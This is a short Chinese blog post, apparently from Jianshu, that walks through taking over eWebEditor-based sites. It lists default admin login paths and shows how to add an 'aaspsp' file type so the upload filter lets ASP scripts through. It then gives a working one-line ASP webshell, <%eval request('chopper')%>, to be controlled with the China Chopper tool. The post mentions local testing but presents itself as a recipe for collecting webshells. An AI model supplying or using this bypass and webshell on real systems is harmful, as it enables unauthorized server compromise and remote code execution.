eWebEditor编辑器获取webshell

一大帮水货正在赶来!

eWebEditor是一个基于浏览器的在线HTML编辑器。因为十分的好用而拥有相当多的用户。虽然很老了。但是它也助我们小菜拿了很多的webshell
本地搭建网站进行测试

进入正题

—————————————————————————————————————

1、编辑器默认的后台登陆口:

Editor/admin/asp/upload.asp
Editor/admin_login.asp
ewebeditor/admin_login.asp
admin/Editor/admin_login.asp
admin/ewebeditor/admin_login.asp

2.进入后台之后

找上传的地方


图片.png

注:添加图片类型这里,会出错,如果直接是asp|aspx|cer 上传文件会出错,也不能解析,要上传aaspsp|aspx|cer ,这样就可以解析

添加工具栏——按钮设置——添加或者修改图片

图片.png

上传木马<%eval request("chopper")%>

图片.png

可以访问上传的木马,则可以使用菜刀进行连接。

图片.png
图片.png
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 1.什么是解析漏洞 以其他格式执行出脚本格式的效果。 2.解析漏洞产生的条件 1.命名规则 2.搭建平台 3.常见...
    查无此人asdasd阅读 1,976评论 0 3
  • 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直...
    付出从未后悔阅读 1,290评论 0 4
  • [SQL注入攻击] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式...
    James黄杰阅读 2,974评论 0 30
  • 时光阡陌,人们依旧每天周而复始的忙碌着,纷乱嘈杂的城市,拥挤不堪的街道,总是让人的精神处于紧绷状态,几乎喘不过气来...
    古城苍狼阅读 3,032评论 3 8
  • 据悉,电影《百万小妞》的制片方华夏中影、天雄影业与湖南芒果影业发展有限公司及湖南众智投资发展有限公司正式签订了投资...
    名人资讯阅读 449评论 0 1

友情链接更多精彩内容